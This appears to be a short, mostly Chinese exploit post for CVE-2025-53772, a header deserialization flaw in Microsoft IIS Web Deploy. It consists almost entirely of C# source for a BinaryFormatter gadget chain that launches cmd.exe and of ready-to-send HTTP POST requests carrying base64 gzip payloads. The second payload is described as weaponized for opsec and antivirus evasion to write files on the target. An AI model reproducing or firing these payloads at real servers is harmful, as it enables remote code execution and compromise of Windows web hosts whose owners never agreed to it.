CVE-2025-53772 IIS WebDeploy RCE
CVE-2025-53772 IIS WebDeploy RCE
Microsoft Web Deploy 中msdeployagentservice 和msdeploy.axd 端点HTTP 标头内容反序列化漏洞
致谢
漏洞评分
CVE-2025-53772 / 8.8
IIS WebDeploy
Poc
using System; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.IO.Compression; using System.Reflection; using System.Runtime.Serialization.Formatters.Binary; namespace ConsoleApp1ee { class Program { static void Main(string[] args) { Delegate da = new Comparison<string>(String.Compare); Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da); IComparer<string> comp = Comparer<string>.Create(d); SortedSet<string> set = new SortedSet<string>(comp); set.Add("cmd.exe"); set.Add("/c calc"); FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance); object[] invoke_list = d.GetInvocationList(); invoke_list[1] = new Func<string, string, Process>(Process.Start); fi.SetValue(d, invoke_list); using (MemoryStream stream = new MemoryStream()) { BinaryFormatter formatter = new BinaryFormatter(); formatter.Serialize(stream, set); using (MemoryStream compst = new MemoryStream()) { using (GZipStream gzipStream = new GZipStream(compst, CompressionMode.Compress)) { stream.Position = 0; stream.CopyTo(gzipStream); } string gzb4 = Convert.ToBase64String(compst.ToArray()); Console.WriteLine(gzb4); } } } } }POST /msdeployagentservice HTTP/1.1 Host: 192.168.116.129 MSDeploy.RequestId: 1 Content-Type: application/msdeploy MSDeploy.Method: Sync MSDeploy.SyncOptions: H4sIAAAAAAAEAM1VXW/TMBRNmtZNsnUMBAjGS8QTaFXWdhtjD0WaOj6qCTSRiZeq2lL3rkQk9rAdifLMK/+Ffwi+rTMYYoyKFuEo15/3+Pj45sayLcv6qgvWWJZL2nSjsVSQ1YM3IGTCWXsrbOBTDzp5qnIBbQa5EnFaDw7zQZrQAxgf8XfA2oOdnXibbj9q7m5uQePxbgVxP9lTvLDD0xSo0ogyfA4MRELDiAsFwwjUSbPXM+siJRI2qgeZpFykyWAORPr9smZS6fCcKbfDs7NYgKga2EpX7yotxyLu599xnfolkrMCYdGkXbwOfD2naOA5ytj7z6jiTS8d0/N9nftmt31IYRQriDSxOE0+xsj0BU+HILyKdrpeNkcjRJvqBg1onFJSxQ7NhiF8gDKu+wM8lMUt5qsZqLd82DB103GcxtUQ68XcU6bEeMM4vIZTI3H4ErIBiC475b/wnnW95+KVemh8vFfszkwSlSqr8Rm4sZR6t3RMVCxGoG5MqyM9tWdmVr4PvYoz8KfaYLM2/BHTtku2bc8uGFnSZL6UjNuznNGTzYXGXf2fgO8n8YhxqRIqw0PBKUhZD+aWJft9sqxlO5gjdZ/U5prIyYqGW7tcDXIN02uko0t5qxiPGNOzfg2TQMZYXC7CFTteJ9VxPWlFyYjFyNs/b7X8KSRG9KrJfntilGfAlLSxWI5bM0RwUa/vIVcP9fHwVOSmNk8uP1owOdWDn8LsQvchufX3GPjt+zamAdSO3Mb8Z5K3h+FB7mhTu+BD7uqh9S5Tm63ALL2C55p2aJmxGfym3PBisUXuafP+/O9TZPxF/2EmKvgT66EWHkrkL30Dt7++5cQIAAA= Content-Length: 0
exploit
考虑opsec,杀软情况,进行武器化写入文件.
POST /msdeployagentservice HTTP/1.1 Host: 192.168.116.129 MSDeploy.RequestId: 1 Content-Type: application/msdeploy MSDeploy.Method: Sync MSDeploy.SyncOptions: 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 Content-Length: 17